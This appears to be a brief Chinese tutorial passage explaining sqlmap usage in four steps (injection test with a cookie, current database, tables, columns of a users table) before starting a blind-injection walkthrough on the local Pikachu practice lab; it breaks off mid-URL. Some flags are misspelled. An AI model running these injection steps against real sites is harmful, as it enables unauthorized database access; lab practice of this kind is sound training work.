sqlmap是什么:
自动化SQL注入的接管工具。
sqlmap经典用法:
第一步:
-u “xxx” --cookie=“yyy” //带上cookie对URL进行注入测试;
第二步:
-u “xxx” --cookie=“yyy” -current-db //对数据库进行获取;
第三步:
-u “xxx” --cookie=“yyy” -D pikachu --tables //对数据库的表名进行枚举;
第四步:
-u “xxx” --cookie=“yyy” -D pikachu -T users --colunms //对数据库中名为users表的列名进行枚举进行枚举;
实验环境:
皮卡丘靶场—盲注(base on boolean)
实验步骤:
-
找到对应的输入点;
-
提交字符串:1111,发现他是一个get请求:
http://localhost/pikaqiu.cn/vul/sqli/sqli_blind_b.ph